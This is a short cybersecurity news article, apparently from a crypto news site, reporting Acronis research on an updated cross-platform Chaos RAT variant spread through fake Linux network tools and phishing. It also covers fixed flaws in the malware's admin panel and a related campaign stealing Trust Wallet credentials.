- A new version of Chaos RAT Malware is targeting both Windows and Linux systems.
- The malware is spread through fake network tools and phishing emails, often disguised as Linux troubleshooting utilities.
- Chaos RAT gives attackers remote access, file management, and control over infected devices.
- Recent campaigns show connections with cryptocurrency mining activities and theft of wallet credentials.
- Security flaws in the malware’s admin panel have been fixed as of May 2024.
A recent wave of cyber attacks is deploying an updated variant of the malware known as Chaos RAT, impacting both Windows and Linux operating systems. Researchers have found that attackers use deceptive network utility downloads and phishing emails to distribute the malware, particularly targeting Linux users.
Experts from Acronis revealed that Chaos RAT is an open-source remote access tool written in Go, supporting cross-platform deployment. Attackers often trick victims into downloading files disguised as helpful network tools, which in reality install the malware. Once on a system, Chaos RAT connects to an external server, enabling functions like launching remote command shells, managing files, collecting system information, and even shutting down or restarting machines. The latest observed version is 5.0.3, released May 31, 2024.
The Acronis research team stated, “Chaos RAT provides an administrative panel where users can build payloads, establish sessions, and control compromised machines.” They reported that Chaos RAT is used in cryptocurrency mining campaigns, with attacks distributing the malware through phishing links or attachments, and achieving persistence by modifying scheduled task files (such as “/etc/crontab” in Linux). The initial campaigns delivered both Chaos RAT and a separate cryptocurrency miner, showing that Chaos RAT was also used for gathering information about devices.
A with a sample uploaded to VirusTotal in January 2025 from India—titled “NetworkAnalyzer.tar.gz”—suggests attackers are disguising the malware as Linux troubleshooting tools to fool users. The management panel of Chaos RAT previously contained a high-severity vulnerability (CVE-2024-30850) that allowed command injection, as well as a cross-site scripting flaw (CVE-2024-31839). Both issues have now been fixed by the tool’s maintainer.
Researchers highlight that malicious actors use open-source malware like Chaos RAT because it can be quickly customized and makes it harder to determine who is behind attacks. They note that “using publicly available malware helps APT groups blend into the noise of everyday cybercrime,” complicating attribution attempts.
There is also evidence of ongoing campaigns attacking Trust Wallet users on desktop with fake wallets. These attacks are designed to collect browser credentials, extract data from crypto wallets, execute remote commands, and act as clipboard hijackers to steal sensitive information such as seed phrases and private keys. Details about this campaign were shared by Point Wild researcher Kedar S Pandit in a new report, noting the malware can monitor files, clipboard activity, and browser sessions to capture crypto asset details.
✅ Follow BITNEWSBOT on Telegram, Facebook, LinkedIn, X.com, and Google News for instant updates.
Previous Articles:
- Arrow Electronics Joins Hedera Council to Boost Supply Chain Tech
- Adam Back Endorses ‘mNAV Months-to-Cover’ for BTC Companies
- Semler Scientific Adds 185 Bitcoin, Holdings Now Top 4,449 BTC
- Clearstream, Azimut Launch DLT Platform for Private Market Funds
- Nigerians Weigh Cryptocurrency Investments Against Traditional Savings